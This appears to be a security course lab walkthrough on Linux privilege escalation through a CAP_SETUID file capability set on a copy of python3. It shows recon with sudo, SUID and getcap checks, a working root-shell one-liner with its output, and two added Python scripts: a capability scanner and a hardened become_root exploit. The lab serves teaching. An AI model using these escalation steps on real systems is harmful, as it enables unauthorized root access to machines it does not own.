
Privesc With Capabilities demo

Our final privesc walk-through covers Linux file capabilities.

We can find the challenge in /Week4_Privec/Demos/Capbility_Demo

Start it using docker-compose (as usual) and connect over SSH.

Initial Recon

Let's go through a more detailed recon process this time around.

  1. Look for local files
  2. Check sudo rights
  3. Check for SUID binaries
  4. Check for capabilities

Local Files

So we have a copy of Python in our home directory. It is owned by our unprivileged user and has no SUID bit set, so there is nothing obviously exploitable about it yet. We log it as unusual and carry on with our recon.

cueh@6f82719676f9:~$ ls -l
total 4748
-rwxr-xr-x 1 cueh cueh 4861504 Feb  8 21:07 python3

Sudo and SUID

Nothing on sudo or SUID: sudo is not even installed, and the SUID binaries are just the standard set that ships with the distribution.

cueh@e34bd83dcf83:~$  sudo -l
-bash: sudo: command not found

cueh@e34bd83dcf83:~$ find / -perm -4000 2>/dev/null
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/newgrp
/usr/lib/openssh/ssh-keysign
/bin/mount
/bin/umount
/bin/ping
/bin/su

Capabilities

We also search the whole filesystem for files that have capabilities set.

cueh@e34bd83dcf83:~$ getcap -r / 2>/dev/null
/home/cueh/python3 = cap_setuid+ep

We can see that the python3 binary in our home directory has the CAP_SETUID capability. The +ep flags mean it is in the binary's permitted set and is raised into the effective set as soon as the binary is executed. CAP_SETUID lets a process change its own user IDs arbitrarily (the setuid(), setreuid() and setresuid() family of system calls) without being root.

This should let us become root if we can get the program to call the setuid() system call with a UID of 0.
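As an added example that is not part of the original page or the course material: the following Python scanner reproduces the find -perm -4000 and getcap -r steps above without needing getcap installed, reading each file's security.capability xattr directly and decoding it the way getcap does. The capability numbers and the xattr layout (struct vfs_cap_data) come from the Linux kernel headers; the "+ep" output format follows the page's getcap output (newer libcap prints "=ep" instead), and the default root path in the usage guard is an assumption.

```python
import os
import stat
import struct
import sys

# Capability numbers from linux/capability.h: bit n of a mask is capability n.
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]

# Layout of the security.capability xattr (struct vfs_cap_data in the kernel):
# a little-endian u32 "magic_etc" holding the revision in the top byte and the
# effective flag in bit 0, followed by (permitted, inheritable) u32 pairs for
# the low and (revision >= 2) high 32 capability bits. Revision 3 adds a rootid.
VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_FLAGS_EFFECTIVE = 0x00000001


def cap_names(mask):
    """Expand a capability bitmask into names (unknown bits are shown as numbers)."""
    return [CAP_NAMES[b] if b < len(CAP_NAMES) else str(b)
            for b in range(64) if mask >> b & 1]


def decode_vfs_cap(blob):
    """Decode a raw security.capability value into getcap-style text, e.g. 'cap_setuid+ep'."""
    magic = struct.unpack_from("<I", blob, 0)[0]
    revision = (magic & VFS_CAP_REVISION_MASK) >> 24
    effective = bool(magic & VFS_CAP_FLAGS_EFFECTIVE)
    if revision == 1:
        perm_lo, inh_lo = struct.unpack_from("<II", blob, 4)
        perm_hi = inh_hi = 0
    elif revision in (2, 3):
        perm_lo, inh_lo, perm_hi, inh_hi = struct.unpack_from("<IIII", blob, 4)
    else:
        raise ValueError("unknown security.capability revision %d" % revision)
    permitted = perm_lo | perm_hi << 32
    inheritable = inh_lo | inh_hi << 32
    # Group capabilities by their flag string, the way getcap prints them.
    groups = {}
    for bit in range(64):
        p, i = permitted >> bit & 1, inheritable >> bit & 1
        if not (p or i):
            continue
        flags = ("e" if p and effective else "") + ("i" if i else "") + ("p" if p else "")
        groups.setdefault(flags, []).append(cap_names(1 << bit)[0])
    return " ".join(",".join(names) + "+" + flags for flags, names in groups.items())


def scan(root):
    """Walk root and return (suid_files, {path: caps}) like find -perm -4000 and getcap -r."""
    suid, caps = [], {}
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if not stat.S_ISREG(st.st_mode):
                continue
            if st.st_mode & stat.S_ISUID:
                suid.append(path)
            try:
                blob = os.getxattr(path, "security.capability", follow_symlinks=False)
            except (OSError, AttributeError):
                # ENODATA (no caps), ENOTSUP (no xattr support), EACCES, or a non-Linux os module
                continue
            caps[path] = decode_vfs_cap(blob)
    return suid, caps


if __name__ == "__main__":
    # Assumed usage: python3 capscan.py [root]; scanning / is the default.
    suid, caps = scan(sys.argv[1] if len(sys.argv) > 1 else "/")
    print("SUID binaries:")
    for path in suid:
        print("  " + path)
    print("Files with capabilities:")
    for path, text in caps.items():
        print("  %s = %s" % (path, text))
```

Reading security.capability needs no privileges, which is why getcap works as an ordinary user; a 20-byte revision-2 value of 01 00 00 02 80 00 00 00 followed by zeros decodes to cap_setuid+ep, matching the page's output for /home/cueh/python3.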

Building an exploit

Python's os module exposes system-level functionality, such as managing processes and the environment.

It also exposes os.setuid(), a thin wrapper around the setuid() system call. Switching to UID 0 normally requires CAP_SETUID, which an ordinary user does not have, but the file capability on our python3 binary gives it to us.

Our Python program that does this looks something like:

import os
os.setuid(0)            # sets real, effective and saved uid to 0 using CAP_SETUID
os.system('/bin/sh')    # spawns a shell that inherits uid 0

We can also do this as a one-liner using the -c flag. Note that only the user ID changes: the gid in the output stays as cueh because we only called setuid(), but the spawned shell runs as uid 0, which is all we need.

cueh@6f82719676f9:~$ ./python3 -c "import os; os.setuid(0); os.system('/bin/sh')"
# id
uid=0(root) gid=1000(cueh) groups=1000(cueh)
# 
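As an added example that is not part of the original page: the one-liner above assumes the capability is actually there, and gives a bare PermissionError if it is not (for example when the script is run through the system python3 rather than the ./python3 in our home directory). This version first checks the effective capability set of the running process in /proc/self/status, where CAP_SETUID is bit 7 of the CapEff mask, and reports why it failed instead of just crashing. The shell path and the exit code are assumptions.

```python
import os
import sys

CAP_SETUID = 7   # capability number from linux/capability.h, i.e. bit 7 of CapEff


def effective_caps(status_text):
    """Return the CapEff bitmask from the text of /proc/<pid>/status (0 if absent)."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return int(line.split(":", 1)[1].strip(), 16)
    return 0


def has_cap_setuid(status_text):
    """True if CAP_SETUID is in the effective set described by status_text."""
    return bool(effective_caps(status_text) >> CAP_SETUID & 1)


def become_root(shell="/bin/sh"):
    """Switch to uid 0 and exec a shell; on failure return a reason instead of raising."""
    with open("/proc/self/status") as f:
        status = f.read()
    if not has_cap_setuid(status):
        return "CAP_SETUID is not in this process's effective set (CapEff=%016x)" % effective_caps(status)
    try:
        os.setuid(0)    # with CAP_SETUID this sets real, effective and saved uid to 0
    except PermissionError as e:
        return "setuid(0) failed: %s" % e
    if os.geteuid() != 0:
        return "setuid(0) returned but euid is still %d" % os.geteuid()
    # exec replaces this interpreter; a uid-0 process picks up full capabilities on exec,
    # so the shell is a real root shell even though only cap_setuid was granted to python3.
    os.execv(shell, [shell])


if __name__ == "__main__":
    # Assumed usage: ./python3 root.py  (only returns if it could not get root)
    print(become_root(), file=sys.stderr)
    sys.exit(1)
```

Checking CapEff rather than CapPrm matters: a file capability set to +p only (no e) would land in the permitted set but not the effective set, and plain Python has no way to raise it without calling capset() itself, so os.setuid(0) would still fail.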


Tasks

Easy task

Follow through with the capabilities-based walkthrough, and get the flag.
